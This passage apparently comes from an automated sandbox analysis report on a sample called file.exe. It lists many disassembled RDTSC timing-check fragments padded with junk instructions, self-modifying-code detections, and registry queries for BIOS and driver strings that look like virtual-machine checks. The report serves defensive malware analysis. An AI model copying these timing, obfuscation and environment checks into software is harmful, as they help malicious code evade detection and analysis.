                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A89EA second address: 10A89F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8B4B second address: 10A8B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F8114E11BFBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8B76 second address: 10A8B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8B7B second address: 10A8BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F8114E11BE6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8114E11BF2h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8114E11BF7h 0x00000022 jnp 00007F8114E11BE6h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8D34 second address: 10A8D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8D39 second address: 10A8D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8114E11BE6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF1A9 second address: 10AF1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8114B92472h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF1CE second address: 10AF1D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF35F second address: 10AF38E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8114B92466h 0x00000008 jmp 00007F8114B92476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F8114B92466h 0x00000016 js 00007F8114B92466h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF4B1 second address: 10AF4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF61D second address: 10AF621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF621 second address: 10AF631 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF631 second address: 10AF635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF8E3 second address: 10AF8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jmp 00007F8114E11BEAh 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA4E second address: 10AFA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA52 second address: 10AFA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F8114E11BE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA62 second address: 10AFA7D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8114D9D1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8114D9D1FBh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA7D second address: 10AFA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA84 second address: 10AFA9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D1FCh 0x00000007 js 00007F8114D9D1FEh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0248 second address: 10B024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B08B4 second address: 10B08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8114D9D200h 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4C59 second address: 10B4C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114DEC06Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B99F9 second address: 10B99FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B99FF second address: 10B9A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8114DEC079h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F8114DEC071h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9A1E second address: 10B9A23 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9A23 second address: 10B9A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F8114DEC07Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9A4A second address: 10B9A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8114D9D207h 0x00000009 jmp 00007F8114D9D204h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5804 second address: 10C581C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC06Fh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C581C second address: 10C5822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5822 second address: 10C5833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5833 second address: 10C5860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F8114D9D200h 0x0000000d jmp 00007F8114D9D204h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5860 second address: 10C5865 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C993F second address: 10C995E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C995E second address: 10C9962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0334 second address: 10D0339 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3ED0 second address: 10D3ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3ED4 second address: 10D3EDE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114D9D1F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE65 second address: 10DAE7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC06Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8114DEC066h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE7E second address: 10DAE82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE82 second address: 10DAE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE88 second address: 10DAEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F8114D9D200h 0x0000000d pushad 0x0000000e jp 00007F8114D9D1F6h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E2746 second address: 10E276B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F8114DEC066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8114DEC077h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E276B second address: 10E2771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E28C6 second address: 10E28F0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114DEC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8114DEC074h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 js 00007F8114DEC06Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E527F second address: 10E5289 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114D9D1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E5289 second address: 10E528E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85FA second address: 10E8603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8603 second address: 10E8607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8767 second address: 10E876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E876B second address: 10E8792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F8114DEC079h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104B5E second address: 1104B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104B64 second address: 1104B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CBF second address: 1104CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CC5 second address: 1104CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F8114DEC07Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CD4 second address: 1104CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114D9D200h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8114D9D1FEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CF8 second address: 1104CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11139C3 second address: 11139C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11139C9 second address: 11139CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113B54 second address: 1113B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113B5D second address: 1113B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113CC6 second address: 1113CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114126 second address: 1114153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F8114DEC06Ch 0x0000000b pushad 0x0000000c jmp 00007F8114DEC077h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114311 second address: 1114315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114315 second address: 111433A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8114DEC074h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111433A second address: 111433E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111433E second address: 1114346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114346 second address: 1114352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007F8114D9D1F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111474B second address: 111474F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111736E second address: 1117372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117649 second address: 111764F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111764F second address: 1117663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8114D9D1FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117942 second address: 1117946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117946 second address: 111794A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111794A second address: 11179B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F8114DEC068h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 or edx, 49ADECD2h 0x00000027 push dword ptr [ebp+122D2C7Ah] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F8114DEC068h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov edx, dword ptr [ebp+122D3996h] 0x0000004d push 1DD4FB17h 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jnc 00007F8114DEC066h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C127 second address: 111C136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D1FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C136 second address: 111C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F8114DEC066h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57702F7 second address: 5770381 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8114D9D200h 0x00000008 sub eax, 62B51ED8h 0x0000000e jmp 00007F8114D9D1FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F8114D9D206h 0x0000001d push eax 0x0000001e jmp 00007F8114D9D1FBh 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8114D9D204h 0x0000002b and cl, FFFFFF98h 0x0000002e jmp 00007F8114D9D1FBh 0x00000033 popfd 0x00000034 mov di, si 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8114D9D201h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770381 second address: 57703EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8114DEC073h 0x00000013 add ah, 0000006Eh 0x00000016 jmp 00007F8114DEC079h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F8114DEC070h 0x00000022 or eax, 326879E8h 0x00000028 jmp 00007F8114DEC06Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577042F second address: 5770492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F8114D9D1FCh 0x00000011 and cl, 00000008h 0x00000014 jmp 00007F8114D9D1FBh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F8114D9D206h 0x00000022 xor cl, 00000068h 0x00000025 jmp 00007F8114D9D1FBh 0x0000002a popfd 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770492 second address: 57704AE instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8114DEC071h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704AE second address: 57704B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704B4 second address: 57704D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704D4 second address: 57704D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704D8 second address: 57704DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704DE second address: 57704FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8114D9D209h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704FB second address: 57704FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704FF second address: 5770526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F8114D9D1FDh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8114D9D1FDh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040EEA second address: 1040EF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041083 second address: 10410AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D1FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8114D9D1FAh 0x00000011 jc 00007F8114D9D1FCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E91BDB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E91BB6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1036833 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1034E2B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E8F1BE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 105B608 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10BF9B3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
